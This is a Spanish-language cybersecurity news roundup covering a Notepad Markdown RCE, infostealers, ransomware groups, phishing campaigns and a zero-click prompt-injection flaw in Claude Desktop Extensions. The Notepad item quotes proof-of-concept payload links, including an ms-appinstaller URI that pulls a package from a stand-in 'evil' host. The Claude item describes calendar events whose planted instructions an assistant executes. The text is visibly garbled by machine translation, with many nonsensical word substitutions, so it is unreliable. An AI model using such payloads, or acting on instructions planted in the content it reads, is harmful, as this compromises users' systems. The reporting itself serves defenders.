AI Prompt RCE, Claude 0-Click, RenEngine Loader, Auto 0-Days y más de 25 historias

Microsoft ha parcheado una equivocación de inyección de comandos (CVE-2026-20841, puntuación CVSS: 8.8) en su aplicación Bloc de notas que podría resultar en la ejecución remota de código. “La neutralización inadecuada de medios especiales utilizados en un comando (‘inyección de comando’) en la aplicación Bloc de notas de Windows permite que un atacante no competente ejecute código a través de una red”, dijo Microsoft. Un atacante podría usar esta equivocación engañando a un usufructuario para que haga clic en un enlace receloso internamente de un archivo Markdown hendido en el Bloc de notas, lo que provocaría que la aplicación ejecutara archivos remotos. “El código receloso se ejecutaría en el contexto de seguridad del usufructuario que abrió el archivo Markdown, otorgando al atacante los mismos permisos que ese usufructuario”, añadió el gigantesco tecnológico. Los exploits de prueba de concepto (PoC) muestran que la vulnerabilidad se puede activar creando un archivo Markdown con enlaces “file://” que apunten a archivos ejecutables (“file://C:/windows/system32/cmd.exe”) o que contengan URI especiales (“ms-appinstaller://?source=https://evil/xxx.appx”) para ejecutar cargas bártulos arbitrarias. El problema se solucionó como parte de su aggiornamento mensual del martes de parches de esta semana. Microsoft agregó compatibilidad con Markdown al Bloc de notas en Windows 11 en mayo pasado.

TeamT5 dijo que rastreó más de 510 operaciones de amenazas persistentes avanzadas (APT) que afectaron a 67 países a nivel mundial en 2025, de las cuales 173 ataques tuvieron como objetivo Taiwán. “El papel de Taiwán en las tensiones geopolíticas y los títulos en la cautiverio de suministro de tecnología universal lo hace especialmente inerme para los adversarios que buscan inteligencia o acercamiento a abundante plazo para conquistar objetivos políticos y militares”, dijo el proveedor de seguridad. “Taiwán es más que un simple objetivo: funciona como un campo de pruebas donde las APT del ilación con China prueban y perfeccionan sus tácticas antiguamente de llevarlas a otros entornos”.

Se ha detectado un nuevo mangante de información de Node.js llamado LTX Stealer. Dirigido a sistemas Windows y distribuido a través de un instalador Inno Setup muy ofuscado, el malware realiza una monasterio de credenciales a gran escalera de navegadores basados ​​en Chromium, apunta a artefactos relacionados con criptomonedas y prepara los datos recopilados para su exfiltración. “La campaña se friso en una infraestructura de dirección respaldada en la nimbo, donde Supabase se utiliza exclusivamente como capa de autenticación y control de acercamiento para el panel del cirujano, mientras que Cloudflare se aprovecha para los servicios de backend y encubrir los detalles de la infraestructura”, dijo CYFIRMA.

Otro nuevo mangante de información orientado a Windows es Ámbito Stealer, que se observó por primera vez en junio de 2025. Se entrega a través de un descargador en un archivo ZIP y apunta principalmente a datos del navegador, información de billeteras de criptomonedas, archivos de servicios populares en la nimbo como Dropbox y Google Drive, y otros archivos confidenciales almacenados en el sistema de la víctima. “Ámbito Stealer se friso en cadenas cifradas que se descifran sólo en tiempo de ejecución para evitar el investigación quieto. Adicionalmente, el mangante de información utiliza las API de Windows para detectar herramientas antianálisis como Wireshark, x64dbg y Process Hacker”, dijo Zscaler ThreatLabz. “Los datos robados se cifran mediante AES-256 antiguamente de enviarse a los servidores C2 mediante solicitudes HTTP POST”.

Se ha observado una nueva campaña de apropiación de cuentas que abusa de los flujos de trabajo de autenticación nativos de Telegram para obtener sesiones de usufructuario totalmente autorizadas. En una cambio, se solicita a las víctimas que escaneen un código QR en sitios falsos utilizando la aplicación móvil Telegram, iniciando un intento verdadero de inicio de sesión en Telegram vinculado a credenciales API controladas por el atacante. Luego, Telegram envía un mensaje de autorización internamente de la aplicación a la sesión existente de la víctima. Alternativamente, los usuarios asimismo pueden ingresar su código de país, número de teléfono y código de demostración (si está apoderado) en una página web falsa, lo que hace que los datos se transmitan a las API de autenticación oficiales de Telegram. Tras la demostración exitosa, Telegram emite una solicitud de autorización en la aplicación como antiguamente. “A diferencia de los ataques de phishing tradicionales que se basan exclusivamente en la monasterio de credenciales o la reproducción de tokens, esta campaña aprovecha las credenciales API de Telegram controladas por el atacante y se integra directamente con la infraestructura legítima de inicio de sesión y autorización de Telegram”, señaló CYFIRMA. “Al inducir a las víctimas a aprobar solicitudes de autorización en la aplicación con falsos pretextos, los atacantes logran comprometer completamente la sesión y al mismo tiempo minimizan las anomalías técnicas y las sospechas de los usuarios”.

Discord ha anunciado que requerirá que todos los usuarios a nivel mundial verifiquen sus edades compartiendo selfies en video o proporcionando identificaciones gubernamentales para lograr a cierto contenido. Adicionalmente, implementará un maniquí de inferencia de permanencia, un nuevo sistema que se ejecuta en segundo plano para ayudar a determinar si una cuenta pertenece a un adulto, sin requerir siempre que los usuarios verifiquen su permanencia. La compañía ha asegurado que los videos selfies no salen del dispositivo del usufructuario, que los documentos de identidad enviados a proveedores externos, en este caso k-ID, se “eliminan rápidamente” o “inmediatamente” posteriormente de la confirmación de la permanencia, y que otros usuarios no pueden ver el estado de demostración de la permanencia de un usufructuario. Sin retención, han surgido preocupaciones sobre si se puede encomendar a Discord su información más confidencial, especialmente posteriormente de una violación de seguridad de un servicio de terceros en el que Discord confiaba anteriormente para corroborar edades en el Reino Unido y Australia. El incidente provocó el robo de identificaciones gubernamentales de 70.000 usuarios de Discord. En una proclamación dada a Ars Technica, k-ID dijo que la tecnología de estimación de permanencia se ejecuta completamente en el dispositivo y que ningún tercero almacena datos personales compartidos durante las comprobaciones de permanencia. La medida llega en un momento en que se están adoptando en todo el mundo leyes que exigen la demostración de la permanencia en las plataformas de redes sociales. Discord confirmó que “un tiro universal por fases” comenzaría a “principios de marzo”, momento en el cual todos los usuarios a nivel mundial tendrían experiencias “apropiadas para adolescentes” de forma predeterminada.

Un nuevo investigación del malware GuLoader ha revelado que emplea código polimórfico para construir constantes dinámicamente durante la ejecución y ofuscación del flujo de control basada en excepciones para ocultar su funcionalidad y sortear la detección. Adicionalmente de introducir sofisticados mecanismos de manejo de excepciones para complicar el investigación, el malware intenta eludir las reglas basadas en la reputación alojando cargas bártulos en servicios confiables en la nimbo como Google Drive y OneDrive. Observado por primera vez en diciembre de 2019, GuLoader sirve principalmente como descargador de troyanos de acercamiento remoto (RAT) y ladrones de información.

Daren Li, de 42 abriles, con doble procedencia de China y St. Kitts y Nevis, ha sido sentenciado en desaparición en los EE. UU. al mayor admitido de 20 abriles de prisión y tres abriles de dispensa supervisada por su plan internacional de inversión en criptomonedas conocido como matanza de cerdos o hostigamiento romántico que defraudó a las víctimas por más de 73,6 millones de dólares. Li se declaró culpable de su delito en noviembre de 2024. Sin retención, el dibujado se cortó el profesor de tobillo y huyó del país en diciembre de 2025. Se desconoce su paradero coetáneo. “Como parte de su acuerdo de culpabilidad, Li admitió que miembros no acusados ​​de la conspiración contactarían a las víctimas directamente a través de interacciones no solicitadas en las redes sociales, llamadas y mensajes telefónicos, y servicios de citas en ringlera”, dijo el Sección de Imparcialidad de Estados Unidos. “Los cómplices no acusados ​​se ganarían la confianza de las víctimas estableciendo relaciones profesionales o románticas con ellas, a menudo comunicándose mediante mensajes electrónicos enviados a través de aplicaciones cifradas de extremo a extremo”. Los co-conspiradores establecieron dominios y sitios web falsificados que se parecían a plataformas legítimas de comercio de criptomonedas y engañaron a las víctimas para que invirtieran en criptomonedas a través de estas plataformas fraudulentas posteriormente de ganarse su confianza. Li asimismo confesó que ordenaría a los cómplices que abrieran cuentas bancarias estadounidenses establecidas en nombre de 74 empresas espantajo y supervisaría la recibimiento de transferencias electrónicas interestatales e internacionales de los fondos de las víctimas. “Li y otros cómplices recibirían los fondos de las víctimas en cuentas financieras que controlaban y luego monitorearían la conversión de los fondos de las víctimas a moneda posible”, dijo el área.

Una vulnerabilidad de ejecución remota de código sin clic (puntuación CVSS: 10.0) en Claude Desktop Extensions (DXT) podría explotarse para comprometer silenciosamente un sistema mediante un simple evento de Google Calendar cuando un usufructuario emite un mensaje inofensivo como “Por valía, revisa mis últimos eventos en Google cal(endar) y luego ocúpate de ello por mí”. El problema surge de cómo los sistemas basados ​​en MCP como Claude DXT encadenan de forma autónoma diferentes herramientas y conectores externos para satisfacer las solicitudes de los usuarios sin imponer límites de seguridad adecuados. La frase “ocúpate de ello” hace el trabajo pesado aquí, ya que el asistente de inteligencia industrial (IA) la interpreta como una coartada para ejecutar instrucciones arbitrarias integradas en esos eventos sin apañarse el permiso de los usuarios. La equivocación afecta a más de 10.000 usuarios activos y 50 extensiones DXT, según LayerX. “A diferencia de las extensiones de navegador tradicionales, Claude Desktop Extensions se ejecuta sin entorno de pruebas y con todos los privilegios del sistema”, dijo la empresa de seguridad del navegador. “Como resultado, Claude puede encadenar de forma autónoma conectores de bajo peligro (por ejemplo, Google Calendar) a ejecutores locales de suspensión peligro, sin que el usufructuario lo sepa o sin su consentimiento. Si lo explota un mal actor, incluso un mensaje indulgente (‘ocúpate de ello’), próximo con un evento de calendario receloso, es suficiente para desencadenar la ejecución de código específico subjetivo que compromete todo el sistema”. Anthropic ha optado por no solucionar el problema en este momento. Miggo Security reveló el mes pasado una equivocación similar de inyección rápida de Google Gemini.

Un inaugural clase de ransomware llamado Coinbase Cartel se ha cobrado más de 60 víctimas desde que surgió por primera vez en septiembre de 2025. “Las operaciones de Coinbase Cartel están marcadas por una insistencia en robar datos dejando los sistemas disponibles en oportunidad de complementar el robo de datos con el uso de cifradores que prohíben el acercamiento al sistema”, dijo Bitdefender. Las industrias de la vigor, la tecnología y el transporte representan una parte importante del clase demográfico de víctimas más egregio del Cartel Coinbase hasta la época. Las organizaciones de atención médica afectadas por el actor de amenazas tienen su sede principalmente en los Emiratos Árabes Unidos. Algunos de los otros grupos destacados que se centran exclusivamente en el robo de datos son World Leaks y PEAR (Pure Extraction and Ransom). El ampliación muestra una imagen de un panorama de ransomware en constante proceso poblado por actores nuevos y antiguos, incluso cuando la amenaza se profesionaliza cada vez más a medida que los atacantes agilizan las operaciones. Según datos de Cyble, en 2025 se registraron 6.604 ataques de ransomware, un 52% más que los 4.346 ataques reclamados por grupos de ransomware en 2024.

Google ha ampliado su utensilio “Resultados sobre usted” para ofrecer a los usuarios más control sobre la información personal confidencial y agregó una forma de solicitar la exterminio de imágenes explícitas no consensuadas de los resultados de búsqueda, así como otros detalles como números de atrevimiento de conducir, números de pasaporte y números de Seguro Social. “Entendemos que eliminar el contenido existente es sólo una parte de la decisión”, dijo Google. “Para veterano protección, el nuevo proceso le permite optar por salvaguardas que filtrarán proactivamente cualquier resultado manifiesto adicional que pueda aparecer en búsquedas similares”.

Se ha observado que los actores de amenazas aprovechan Net Preceptor, una utensilio comercial de monitoreo de la fuerza gremial, con SimpleHelp, una plataforma legítima de monitoreo y oficina remota (RMM), como parte de ataques diseñados para implementar Crazy ransomware. Los dos incidentes, que se cree que fueron obra del mismo actor de amenazas, tuvieron oportunidad en enero y febrero de 2026. Net Preceptor viene con varias capacidades que van más allá del seguimiento de la productividad de los empleados, incluidas conexiones de shell inversas, control de escritorio remoto, oficina de archivos y la capacidad de personalizar nombres de servicios y procesos durante la instalación. Estas características, próximo con la funcionalidad de acercamiento remoto de SimpleHelp, las convierten en herramientas atractivas para los atacantes que buscan integrarse en entornos empresariales sin implementar malware tradicional. Es más, Net Preceptor for Employees Professional incluye un pseudoterminal (“winpty-agent.exe”) que facilita la ejecución completa de comandos. Se ha descubierto que los delincuentes aprovechan este aspecto para realizar reconocimientos, entregar cargas bártulos adicionales e implementar canales secundarios de acercamiento remoto, convirtiéndolo en un troyano de acercamiento remoto sencillo. “En los casos observados, los actores de amenazas utilizaron estas dos herramientas juntas, utilizando Net Preceptor for Employees como canal principal de acercamiento remoto y SimpleHelp como capa de persistencia redundante, lo que finalmente condujo al intento de implementación del ransomware Crazy”, dijo Huntress.

Un actor de amenazas llamado 0APT parece estar afirmando falsamente que ha violado a más de 200 víctimas en el plazo de una semana desde que lanzó su sitio de filtración de datos el 28 de enero de 2026. Un investigación más detallado ha determinado que las víctimas son una mezcla de nombres genéricos de empresas totalmente inventados y organizaciones reconocibles que los actores de amenazas no han violado, dijo el equipo de investigación e inteligencia de GuidePoint. El sitio de filtración de datos se desconectó el 8 de febrero de 2026, antiguamente de resurgir al día ulterior con una inventario de más de 15 organizaciones multinacionales muy grandes. “Es probable que 0APT esté operando de esta modo engañosa para apoyar la molestia de víctimas desinformadas, la reextorsión de víctimas históricas de otros grupos, el fraude a afiliados potenciales o para gestar interés en un clase RaaS incipiente”, señaló el investigador de seguridad Jason Baker. Si aceptablemente las señales sugieren que el clase puede estar mintiendo sobre el número de víctimas, se ha descubierto que las muestras de ransomware para Windows y Linux están en pleno funcionamiento, según Halcyon. Vale la pena señalar que grupos de ransomware como RansomedVC han enumerado ataques fabricados en sus sitios de fuga de datos para engañar a las víctimas. Trillado desde esa perspectiva, las afirmaciones exageradas de 0APT son probablemente un intento de vencer visibilidad e impulso entre sus pares. Sus orígenes siguen siendo desconocidos.

Una vulnerabilidad de seguridad de suspensión peligro (CVE-2025-67813, puntuación CVSS: 5,3) internamente de Quest Desktop Authority podría permitir a los atacantes ejecutar código remoto con privilegios de SISTEMA. “Quest KACE Desktop Authority expone una canalización con nombre (ScriptLogic_Server_NamedPipe_9300) que se ejecuta como SISTEMA y acepta conexiones de cualquier usufructuario de dominio autenticado a través de la red”, dijo NetSPI. La canalización con nombre implementa un protocolo IPC personalizado que admite operaciones peligrosas, incluida la ejecución de comandos arbitrarios, inyección de DLL, recuperación de credenciales e invocación de objetos COM. Cualquier usufructuario autenticado en la red puede conquistar la ejecución remota de código como administrador específico en hosts que ejecutan el agente Desktop Authority.

El organismo de control de Internet de Rusia utilizará tecnología de inteligencia industrial (IA) para analizar el tráfico de Internet y restringir el funcionamiento de los servicios VPN, informó Forbes Rusia. Se paciencia que Roskomnadzor gaste cerca de 30 millones de dólares para desarrollar el mecanismo de filtrado del tráfico de Internet este año. El gobierno ruso ha bloqueado el acercamiento a decenas de aplicaciones VPN en los últimos abriles. Incluso mantiene un registro de sitios web prohibidos.

Cofense dijo que ha observado campañas de Mispadu dirigidas a América Latina, particularmente México y Brasil, y en pequeño medida en España, Italia y Portugal, con correos electrónicos de phishing que contienen archivos adjuntos de aplicaciones HTML (HTA) que están diseñados para eludir las puertas de enlace seguras de correo electrónico (SEG) para ganar a las bandejas de entrada de los empleados en todo el mundo. “La única variación es que a veces la URL que entrega los archivos HTA está incrustada en un PDF adjunto protegido con contraseña en oportunidad de estar incrustada en el correo electrónico en sí”, dijo Cofense. “En todas las campañas recientes, Mispadu utiliza un cargador AutoIT y varios archivos legítimos para ejecutar el contenido receloso. Cada paso de la cautiverio de entrega desde el PDF adjunto hasta el script AutoIT se genera dinámicamente. Esto significa que cada hash, excepto el compilador AutoIT, es único para cada instalación, lo que frustra aún más a EDR”. Las versiones recientes del troyano bancario tienen la capacidad de autopropagarse en hosts infectados a través de correo electrónico y expandir los sitios web de banca en ringlera objetivo para incluir bancos fuera de América Latina, así como intercambios basados ​​en criptomonedas.

En una campaña de phishing documentada por Forcepoint, se descubrió que correos electrónicos falsificados entregaban un archivo adjunto .cmd receloso que aumenta los privilegios, desactiva Windows SmartScreen, elimina la marca de la web (MotW) para evitar las advertencias de seguridad y, en última instancia, instala ConnectWise ScreenConnect. La campaña se ha dirigido a organizaciones de EE. UU., Canadá, el Reino Unido e Irlanda del Boreal, centrándose en sectores con datos de suspensión valencia, incluidos el gobierno, la atención sanitaria y las empresas de abastecimiento. Los ataques de phishing recientes asimismo han abusado de los servicios web de Amazon, como los depósitos de Simple Storage Service (S3), Amazon Simple Email Service (SES) y Amazon Web Services (AWS) Amplify para eludir los controles de seguridad del correo electrónico y divulgar ataques de phishing de credenciales. Otros ataques de phishing han recogido técnicas poco comunes, como el uso de versiones editadas de correos electrónicos comerciales legítimos para entregar correos electrónicos falsificados de modo convincente a los destinatarios. “Estos correos electrónicos funcionan haciendo que el actor de la amenaza cree una cuenta en un servicio verdadero e ingrese texto subjetivo en un campo que luego se incluirá en los correos electrónicos salientes”, dijo Cofense. “Una vez hecho esto, el actor de la amenaza necesitaría admitir un correo electrónico verdadero que incluya el texto receloso creado por el actor de la amenaza. Una vez que se recibe el correo electrónico, el actor de la amenaza puede redirigir el correo electrónico a las víctimas previstas”.

Se ha utilizado una cambio del ataque ClickFix emplazamiento CrashFix para entregar cargas bártulos maliciosas consistentes con un malware conocido llamado SystemBC. A diferencia del flujo de ingeniería social estilo CrashFix documentado por Huntress y Microsoft, el ataque se destaca porque no implicó el uso de una extensión de navegador maliciosa. “En cambio, se convenció a la víctima de ejecutar un comando a través del cuadro de diálogo Ejecutar de Windows (Win+R) como se ve con ClickFix tradicional”, dijo Binary Defense. “Este comando abusó de un binario verdadero de Windows, finger.exe, copiado de System32, renombrado y ejecutado desde un directorio editable por el usufructuario. El resultado de esta ejecución se canalizó directamente a cmd.exe, actuando como un mecanismo de entrega para una carga útil de PowerShell ofuscada”. Luego, el código de PowerShell recupera el contenido ulterior, incluidas las puertas traseras de Python y un implante de DLL que se superpone con SystemBC, de la infraestructura controlada por el atacante, mientras toma medidas para tomar huellas digitales del host y purificar los artefactos en el disco. “La coexistencia de puertas traseras de Python y un implante DLL reflectante resalta una logística deliberada de persistencia y entretenimiento de defensa”, dijo la compañía. “Al mezclar implantes nativos y basados ​​en secuencias de comandos, el atacante redujo la dependencia de un único método de ejecución, lo que hizo que el desalojo completo fuera más difícil”.

La tercera competencia anual Pwn2Own Automotive celebrada en Tokio, Japón, a fines del mes pasado descubrió 76 vulnerabilidades únicas de día cero en una variedad de objetivos, como sistemas de información y entretenimiento en vehículos (IVI) (Tesla), cargadores de vehículos eléctricos (EV) (Alpitronic HYC50, ChargePoint Home Flex) y sistemas operativos de automóviles (Automotive Grade Linux). Team Fuzzware.io ganó la competencia de piratería con ganancias totales de $215,000, seguido por Team DDOS con $100,750 y Synactiv con $85,000.

Los anuncios maliciosos que se muestran en los resultados de búsqueda de Bing cuando se buscan sitios como Amazon se utilizan para redirigir a usuarios desprevenidos a enlaces fraudulentos de soporte técnico alojados en Azure Blob Storage. La campaña se dirigió a los sectores de atención médica, manufactura y tecnología en los EE. UU. “Al hacer clic en el anuncio receloso, las víctimas eran enviadas al espacio highswit(.), un dominio recientemente registrado que aloja un sitio de WordPress malogrado, que luego los redirigía a uno de los contenedores de Azure Blob Storage, que servía un sitio característico de estafa de soporte técnico”, dijo Netskope Threat Labs.

Un proveedor chino de red privada posible (VPN) llamado LVCHA VPN ha sido utilizado por dispositivos en Rusia, China, Myanmar, Irán y Venezuela. Incluso tiene una aplicación para Android alojada directamente en su sitio web (“lvcha(.)in”) y distribuida a través de Google Play Store. Un investigación más detallado del dominio ha descubierto un clase de casi 50 dominios sospechosos, todos los cuales promocionan la misma VPN. “Cada vez que vemos campañas que promueven descargas o productos sospechosos usando tantos dominios, puede indicar que el cirujano está rotando dominios para trabajar aproximadamente de firewalls a nivel de país en regiones donde están tratando de promover la distribución”, dijo Silent Push.

Tras un ciberataque coordinado a finales de diciembre de 2025 a la red eléctrica de Polonia, la Agencia de Seguridad de Infraestructura y Ciberseguridad de EE. UU. (CISA) publicó un boletín para propietarios y operadores de infraestructuras críticas. CISA dijo que los dispositivos de borde vulnerables siguen siendo un objetivo principal para los actores de amenazas, los dispositivos OT sin demostración de firmware pueden dañarse permanentemente y los actores de amenazas aprovechan las credenciales predeterminadas para voltear en torno a la HMI y las RTU. “Los operadores deben priorizar las actualizaciones que permitan la demostración del firmware cuando estén disponibles”, añadió la agencia. “Los operadores deben cambiar inmediatamente las contraseñas predeterminadas y establecer requisitos para que los integradores o proveedores de OT hagan cumplir los cambios de contraseña en el futuro”. En un ampliación similar, Jonathan Ellison, director de resiliencia doméstico del Centro Doméstico de Seguridad Cibernética (NCSC), instó a los operadores de infraestructura crítica en el país a hacer ahora y contar con planes de respuesta a incidentes o guías para objetar a tales amenazas. “Aunque los ataques aún pueden ocurrir, los planes sólidos de resiliencia y recuperación reducen tanto las posibilidades de que un ataque tenga éxito como el impacto si uno tiene éxito”, dijo Ellison.

La firma de inteligencia de amenazas GreyNoise dijo que observó una musculoso disminución en el tráfico Telnet universal el 14 de enero de 2026, seis días antiguamente de que se hiciera conocido un aviso de seguridad para CVE-2026-24061 el 20 de enero. CVE-2026-24061 se relaciona con una vulnerabilidad crítica en el demonio telnet GNU InetUtils que podría resultar en una omisión de autenticación. Los datos recopilados por GreyNoise muestran que el grosor horario de sesiones Telnet cayó un 65% el 14 de enero a las 21:00 UTC y luego cayó un 83% en dos horas. Las sesiones diarias han disminuido de un promedio de 914.000 (del 1 de diciembre de 2025 al 14 de enero de 2026) a aproximadamente de 373.000, lo que equivale a una reducción del 59% que ha persistido hasta el 10 de febrero de 2026. “Dieciocho ASN con un importante grosor de telnet previo a la caída (>50.000 sesiones cada uno) llegaron al cero total posteriormente del 15 de enero”, dijo la compañía. “Cinco países enteros desaparecieron de los datos de telnet de GreyNoise: Zimbabwe, Ucrania, Canadá, Polonia y Egipto. No limitado a cero”. Entre los 18 ASN incluidos se encontraban British Telecom, Charter/Spectrum, Cox Communications y Vultr. Aunque la correlación no implica causalidad, GreyNoise ha planteado la posibilidad de que los operadores de telecomunicaciones probablemente hayan recibido una advertencia previa sobre CVE-2026-24061, lo que les permitirá hacer al respecto a nivel de infraestructura. “Un proveedor de red troncal o de tránsito, posiblemente respondiendo a una solicitud coordinada, posiblemente actuando según su propia evaluación, implementó el filtrado del puerto 23 (para sitiar el tráfico de telnet) en los enlaces de tránsito”, dijo.

Cyderes y Cato Networks han detallado nuevos cargadores de malware previamente no documentados denominados RenEngine Loader y Foxveil que se han utilizado para entregar cargas bártulos de la ulterior etapa. La campaña de malware Foxveil ha estado activa desde agosto de 2025. Está diseñada para establecer un punto de apoyo original, complicar los esfuerzos de investigación y recuperar cargas bártulos de shellcode de la ulterior etapa de la puesta en imagen controlada por actores de amenazas alojadas en plataformas confiables como Cloudflare Pages, Netlify y Discord. Por otro banda, los ataques que aprovechan RenEngine Loader han empleado instaladores de juegos modificados ilegalmente y distribuidos a través de plataformas de piratería para entregar el malware próximo con el contenido reproducible. Se estima que más de 400.000 víctimas en todo el mundo se han manido afectadas, la mayoría de ellas ubicadas en India, Estados Unidos y Brasil. La actividad ha estado operativa desde abril de 2025. “RenEngine Loader descifra, organiza y transfiere la ejecución a Hijack Loader, lo que permite una rápida proceso de las herramientas y un despliegue flexible de capacidades”, dijo Cyderes. “Al incorporar un cargador de segunda etapa modular y sigiloso internamente de un arrojador Ren’Py verdadero, los atacantes imitan fielmente el comportamiento ordinario de las aplicaciones, reduciendo significativamente la detección temprana”. El objetivo final del ataque es implementar un mangante de información llamado ACR Stealer.

Se han revelado dos nuevas vulnerabilidades de seguridad en Google Looker que un atacante podría usar para comprometer completamente una instancia de Looker. Esto incluye una cautiverio de ejecución remota de código (RCE) a través de anulaciones de ganchos de Git y una equivocación de omisión de autorización a través del desmán de conexión de cojín de datos interna. La explotación exitosa de las fallas podría permitir a un atacante ejecutar código subjetivo en el servidor Looker, lo que podría conducir a un acercamiento entre inquilinos, así como filtrar toda la cojín de datos MySQL interna mediante una inyección SQL basada en errores, según Tenable. “Las vulnerabilidades permitieron a los usuarios con permisos de desarrollador en Looker lograr tanto al sistema subyacente que aloja Looker como a su cojín de datos interna”, dijo Google. Con un seguimiento colectivo como CVE-2025-12743, asimismo conocido como LookOut (puntuación CVSS: 6,5), Google los parchó en septiembre de 2025. Si aceptablemente las correcciones se aplicaron a instancias en la nimbo, se recomienda a los usuarios de instancias autohospedadas de Looker que actualicen a la última lectura compatible.

Se está utilizando un instalador fariseo para la utensilio de archivo de archivos 7-Zip descargada de 7zip(.)com (el dominio verdadero es 7-zip(.)org) para colocar un componente proxy que inscribe el host infectado en un nodo proxy residencial. Esto permite a terceros enrutar el tráfico a través de la dirección IP de la víctima ocultando sus propios orígenes. El instalador está firmado digitalmente con un certificado ahora revocado emitido originalmente a Jozeal Network Technology Co., Limited. La campaña recibió el nombre en código upStage Proxy del investigador de seguridad Luke Acha, quien la descubrió a fines del mes pasado. “Los operadores detrás de 7zip(.)com distribuyeron un instalador troyanizado a través de un dominio similar, entregando una copia sencillo de 7-Zip File Manager próximo con una carga útil de malware oculta”, dijo Malwarebytes. El señuelo 7-Zip parece ser parte de un esfuerzo más amplio que utiliza instaladores troyanizados para HolaVPN, TikTok, WhatsApp y Wire VPN. Las cadenas de ataques implican el uso de tutoriales de YouTube como vector de distribución de malware para dirigir a los usuarios desprevenidos al sitio fariseo, lo que pone de relieve una vez más el desmán de plataformas confiables.

VoidLink es un sofisticado entorno de comando y control (C2) basado en Linux capaz de realizar intrusiones a abundante plazo en entornos empresariales y de nimbo. Documentado por primera vez por Check Point el mes pasado, los investigación en curso del malware han revelado que puede ocurrir sido desarrollado por un desarrollador de acento china utilizando un maniquí de inteligencia industrial (IA) con revisión humana limitada. Ontinue, en un referencia publicado esta semana, dijo que encontró “fuertes indicadores” de que el implante se construyó utilizando un agente codificador de maniquí de verbo egregio (LLM). “Toma huellas dactilares de entornos de nimbo en AWS, GCP, Azure, Alibaba Cloud y Tencent Cloud, recopilando credenciales de variables de entorno, directorios de configuración y API de metadatos de instancias”, dijo el investigador de seguridad Rhys Downing. “Detecta tiempos de ejecución de contenedores e incluye complementos para escapar de contenedores y subir privilegios de Kubernetes. Un rootkit a nivel de kernel adapta su enfoque sigiloso en función de la lectura del kernel del host”. Cisco Talos dijo que ha observado el entorno modular en campañas realizadas por un nuevo actor de amenazas con nombre en código UAT-9921, que se cree que ha estado activo desde 2019. La compañía de ciberseguridad dijo que asimismo encontró “indicios claros” de un equivalente de Windows de VoidLink que viene con la capacidad de cargar complementos. “UAT-9921 utiliza hosts comprometidos para instalar el comando y control VoidLink (C2), que luego se utilizan para iniciar actividades de escaneo tanto internas como externas a la red”, dijeron los investigadores de Talos.